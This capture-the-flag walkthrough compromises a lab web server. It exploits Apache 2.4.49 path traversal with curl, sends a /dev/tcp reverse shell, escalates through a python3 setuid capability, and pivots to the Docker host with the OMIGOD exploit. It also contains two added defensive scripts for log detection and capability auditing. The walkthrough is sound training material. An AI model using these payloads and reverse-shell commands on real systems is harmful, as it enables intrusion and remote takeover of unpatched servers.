# Oh My WebServer

## Nmap

```
nmap 10.10.170.23 -p- -Pn -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.49 ((Unix))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Starting with port 80, we arrive at the root page for CONSUULT.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FmEIxlIEALhDIeoCZNAAs%2Fimage.png?alt=media\&token=8f6fcbf8-6774-4bd3-b179-0703629638ed)

Running a web application scan with `Nessus` against the target web server shows the running version of Apache is vulnerable to a critical exploit.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FXN28MiDIZ6IQcfI8htdf%2Fimage.png?alt=media\&token=3d15336b-1af3-4d53-bc9f-85e7ec0f8d0f)

More details regarding the Path Traversal vulnerability are shown below.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FsVlTuIMoocIqiHqMGhva%2Fimage.png?alt=media\&token=5b3d0ca4-83d2-405b-ae00-3d9075af382a)

Researching publicly available exploits, we find a bash script on Exploit-DB.

**Exploit-db:** <https://www.exploit-db.com/exploits/50383>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F2xpdf0LuK5xtDzIuQHCq%2Fimage.png?alt=media\&token=bff52810-af3c-4caa-ac29-2b895df0f5b1)

We can condense the main part of the script into a single command in order to exploit the target system, as shown below; with it we are able to read the contents of `/etc/passwd`.

```
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; cat /etc/passwd" "http://10.10.157.208/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FGxuAhXlwkHCBiLbLEC6I%2Fimage.png?alt=media\&token=47628339-6edc-4521-9268-89fc8cfb5c79)
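Seen from the web server's side, the percent-encoded dot-segments in the request above leave an unmistakable trace in the Apache access log. The following is an added example, not part of the original writeup, that parses combined-format log lines, decodes the request path and flags requests that climb out of the document root through `/cgi-bin/`; the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache combined-log format; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
ENCODED_DOT = re.compile(r'%2e', re.IGNORECASE)

def analyze_path(raw_path):
    """Return the reasons a request path looks like an attempt to walk out of the document root."""
    findings = []
    path = raw_path.split('?', 1)[0]            # ignore the query string
    if ENCODED_DOT.search(path):
        # A normal client never needs to encode a '.'; the 2.4.49 bypass relies on it.
        findings.append('percent-encoded dot in path')
    decoded = unquote(path)
    depth = 0
    for seg in decoded.split('/'):
        if seg == '..':
            depth -= 1
            if depth < 0:                       # more '..' than real segments above it
                findings.append('dot-segments climb above document root')
                break
        elif seg not in ('', '.'):
            depth += 1
    if decoded.startswith('/cgi-bin/') and '..' in decoded.split('/'):
        findings.append('traversal via cgi-bin (target would run as CGI)')
    return findings

def scan_log(text):
    """Return (ip, method, decoded path, findings) for every suspicious line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyze_path(m['path'])
        if findings:
            hits.append((m['ip'], m['method'], unquote(m['path']), findings))
    return hits

# Constructed sample lines modelled on the requests in this writeup (not real logs).
SAMPLE_LOG = """\
10.8.239.254 - - [01/Jan/2022:10:00:01 +0000] "GET / HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.8.239.254 - - [01/Jan/2022:10:00:05 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash HTTP/1.1" 200 1822 "-" "curl/7.82.0"
10.8.239.254 - - [01/Jan/2022:10:00:09 +0000] "GET /icons/../index.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""
```

Running `scan_log(SAMPLE_LOG)` reports only the POST line; the literal `../` in the third line is normalised by Apache and never leaves the document root, so it is not flagged.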

To make exploitation easier we can send the curl request through a local proxy (Burp Suite) in order to capture the request.

```
curl -x localhost:8080 -s --path-as-is -d "echo Content-Type: text/plain; echo; " "http://10.10.82.103/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash"
```

```
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash HTTP/1.1
Host: 10.10.82.103
User-Agent: curl/7.82.0
Accept: */*
Content-Length: 52
Content-Type: application/x-www-form-urlencoded
Connection: close

echo Content-Type: text/plain; echo; cat /etc/passwd
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F2H1TJH19sVuaSrHUCF8s%2Fimage.png?alt=media\&token=b3dcd181-057d-43b7-a64a-29179b01048d)

We can manipulate this request to receive a reverse shell.

```
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash HTTP/1.1
Host: 10.10.82.103
User-Agent: curl/7.82.0
Accept: */*
Content-Length: 77
Content-Type: application/x-www-form-urlencoded
Connection: close

echo Content-Type: text/plain; echo; sh -i >& /dev/tcp/10.8.239.254/4444 0>&1
```

As shown below:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FMmr51shHfQhZFbYdDdpQ%2Fimage.png?alt=media\&token=c91b53dc-3d08-4733-877c-59fb2a9551cd)

From here we find python3 is installed on the target system, so we use it to spawn a proper TTY shell.

```
/usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'
```

Performing basic enumeration on the target system, we find the IP of the system does not match that of the room.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbSPxsHI4fTyHPT5ad8y7%2Fimage.png?alt=media\&token=5aae1ffb-096f-4841-bfa7-b1c1fa1d0202)

We also find a pretty telling `.dockerenv` file in `/`. Combined with the system hostname, these facts let us safely assume we are working within a Docker container.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FqRZQhScG22lcValF3AwW%2Fimage.png?alt=media\&token=39b6dbfa-7ea1-482e-8afa-4f33b5abb0e3)

For further enumeration `linpeas.sh` was downloaded onto the target system.

```
curl http://10.8.239.254/linpeas.sh --output linpeas.sh
```

After executing `linpeas.sh` we see that the current user has the ability to escalate privileges through capabilities set for `python3.7`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbNZdcGb1f7fQaiQ8xqWc%2Fimage.png?alt=media\&token=f35757c6-2742-4d2c-965d-babc728d47b7)

The following command can be used to escalate to **root** within the docker container.

```
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FID5PvFyNPTNPg6FNfRDd%2Fimage.png?alt=media\&token=dbf14ce9-1bd1-419d-bf5b-860443b063fe)
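As a defender-side complement to the `linpeas.sh` finding above, the following added example (not code from the writeup or from any project) audits a directory tree for binaries carrying file capabilities such as `cap_setuid` by decoding the raw `security.capability` extended attribute. It assumes Linux and the kernel's `vfs_cap_data` v2/v3 layout (magic word, then permitted/inheritable as two 32-bit halves each); the constant names mirror the kernel headers but are defined locally.

```python
import os
import struct

CAP_SETUID = 7                       # bit index of CAP_SETUID in the permitted mask
VFS_CAP_FLAGS_EFFECTIVE = 0x000001   # "+e" in getcap output
VFS_CAP_REVISION_MASK = 0xFF000000
SUPPORTED_REVISIONS = (0x02000000, 0x03000000)   # v2 (20 bytes) and v3 (24 bytes, adds rootid)

def parse_vfs_cap(blob):
    """Decode a raw security.capability xattr into (permitted, inheritable, effective_flag)."""
    if len(blob) < 20:
        raise ValueError('capability xattr too short')
    magic = struct.unpack_from('<I', blob, 0)[0]
    if (magic & VFS_CAP_REVISION_MASK) not in SUPPORTED_REVISIONS:
        raise ValueError('unsupported vfs_cap revision')
    # Each 64-bit mask is stored as two little-endian 32-bit halves: data[0] then data[1].
    p_lo, i_lo, p_hi, i_hi = struct.unpack_from('<IIII', blob, 4)
    permitted = (p_hi << 32) | p_lo
    inheritable = (i_hi << 32) | i_lo
    effective = bool(magic & VFS_CAP_FLAGS_EFFECTIVE)
    return permitted, inheritable, effective

def has_cap(mask, cap):
    return bool(mask & (1 << cap))

def read_file_caps(path):
    """Return the parsed caps of `path`, or None if it carries none (Linux only)."""
    try:
        blob = os.getxattr(path, 'security.capability', follow_symlinks=False)
    except OSError:              # ENODATA: no capability set; EPERM/ENOENT: skip quietly
        return None
    return parse_vfs_cap(blob)

def audit(root='/usr', caps=(CAP_SETUID,)):
    """Walk `root` and list regular files whose permitted set includes any of `caps`."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            parsed = read_file_caps(path)
            if parsed and any(has_cap(parsed[0], c) for c in caps):
                hits.append((path, parsed))
    return hits

if __name__ == '__main__':
    for path, (perm, inh, eff) in audit():
        print(path, hex(perm), 'effective' if eff else 'not effective')
```

An interpreter such as `python3.7` showing up in this list with `cap_setuid` set is exactly the condition that lets any user who can run it call `setuid(0)`, so it should be treated as equivalent to a setuid-root shell.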

From here, we are able to grab the `user.txt` flag from `/root/`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FwNlb6gnpb8UkPrVrthWP%2Fimage.png?alt=media\&token=c5ea3f24-aec7-49c8-9cb4-668c4b48f243)

For further enumeration a static `Nmap` binary was uploaded to the target system.

**Github:** <https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap>

```
./nmap 172.17.0.1 -p 1-10000 -sS -v
```

As the current container is running on 172.17.0.2, we check 172.17.0.1, which we find is running something on port 5986.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FdYbloQpHhn3GoZ4k1UyO%2Fimage.png?alt=media\&token=2a7d2bf9-07f3-4f0b-a4a7-cbc31c250524)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FnSmKaoksH1rp618zwxfj%2Fimage.png?alt=media\&token=677bd406-8912-4ddd-bb47-5c51864d5972)

Researching the port number we find that "OMI is an [open-source](https://github.com/microsoft/omi) remote configuration management tool developed by Microsoft."

According to the resources linked below, this may be vulnerable to CVE-2021-38647, which could allow us to perform remote code execution on the host 172.17.0.1.

**BookHackTricks:** <https://book.hacktricks.xyz/pentesting/5985-5986-pentesting-omi>

**CVE:** <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>

**Blog:** <https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/>

**GitHub:** <https://github.com/horizon3ai/CVE-2021-38647>

Download the GitHub Python script linked above onto the target system (served from our attacking host).

```
curl http://10.8.239.254/omigod.py --output omigod.py
```

Test for command execution:

```
python3 omigod.py -t 172.17.0.1 -c hostname
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FyZUYnSGv3dMwYNthbmy5%2Fimage.png?alt=media\&token=cbc99415-2ec2-4163-90eb-9ac11f7b1d8a)

We can then create a bash reverse shell file `shell.sh` and use the RCE on 172.17.0.1 to download it from our attacking host and execute it.

```
python3 omigod.py -t 172.17.0.1 -c "curl http://10.8.239.254/shell.sh --output /tmp/shell.sh"
python3 omigod.py -t 172.17.0.1 -c "bash /tmp/shell.sh"
```

This gives us a root shell on the main host.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9c3RsejVHe0x0g56BErk%2Fimage.png?alt=media\&token=d5391c65-48b3-485e-8d7c-93630d0ca730)
